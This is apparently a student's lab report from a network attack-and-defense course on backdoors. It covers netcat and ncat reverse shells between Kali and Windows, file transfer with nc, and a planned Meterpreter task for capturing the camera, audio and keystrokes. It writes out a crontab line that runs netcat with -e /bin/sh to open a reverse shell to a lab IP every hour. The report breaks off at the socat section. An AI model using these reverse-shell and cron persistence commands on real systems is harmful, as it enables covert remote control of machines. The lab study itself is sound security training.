2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践
1.实验准备
一、实验说明
任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
二、问题回答
- 问:例举你能想到的一个后门进入到你系统中的可能方式?
- 在下载东西时候没有从官方网站,有捆绑软件或后门
- 问:例举你知道的后门如何启动起来(win及linux)的方式?
- win:修改注册表、引诱我们点击从而执行
lunix:绑定注入shellcode开启后门
- 问:Meterpreter有哪些给你映像深刻的功能?
- 远程控制摄像头、键击等用户关键信息
实验过程记录
任务一:Windows获得Linux Shell
-
在Windows下使用
ipconfig
查看本机IP: -
使用ncat.exe程序监听本机的5319端口
-
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5319端口
-
成功获得Kali的shell,如下图所示:
任务二:Linux获得Windows Shell
1. 在Kali环境中使用ifconfig查看IP
2. 使用nc指令监听`5319`端口
3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的`5319`端口
4. Kali下可以看到Windows的命令提示,可以输入Windows命令:
任务三:使用nc传输数据
1. Windows下监听5319端口:
2. Kali下连接到Windows的5319端口:
3. 传输数据:
3. Meterpreter
任务一:使用netcat获取主机操作Shell,cron启动
-
在Windows系统下,监听5319端口
-
用
crontab -e
指令编辑一条定时任务,选择第三个选项: -
在最后一行添加48 * * * * /bin/netcat 192.168.3.103 5319 -e /bin/sh,意思是在每个小时的第48分钟反向连接Windows主机的5319端口:(注意是虚拟机的时间):
-
当时间到了,此时已经获得了Kali的shell,可以输入指令:
任务二:使用socat获取主机操作Shell, 任务计划启动
相关知识:
- socat是ncat的增强版,它使用的格式是socat [options]
https://www.cnblogs.com/Hi-blog/p/6795811.html